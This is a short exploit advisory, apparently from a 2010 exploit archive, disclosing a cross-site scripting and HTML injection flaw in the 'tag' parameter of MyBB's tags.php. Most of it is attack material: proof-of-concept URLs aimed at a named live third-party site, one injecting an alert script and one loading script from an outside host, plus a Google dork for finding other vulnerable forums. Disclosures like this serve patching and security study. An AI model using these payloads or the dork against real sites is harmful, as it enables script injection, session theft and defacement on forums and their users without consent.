MyBB suffers from a cross site scripting vulnerability in tags.php.
1c6e41739e839a6a02b401181bf3082349b3d0c71d058cd8d2ee3be9b322bcae
MyBB all version (tags.php?tag=) - Cross-Site Scripting (XSS) & HTML
Injection
http://www.mybb.com
12-12-2010
Poc: http://infectionsupport.com/tags.php?tag=
"><script>alert(String.fromCharCode(88,83,83))</script>
http://infectionsupport.com/tags.php?tag="><script src%3d//ckers.org/s
></script>
Google dork: powered by mybb inurl:tags.php?tag=
by Teamelite (Methodman) http://nemesis.te-home.net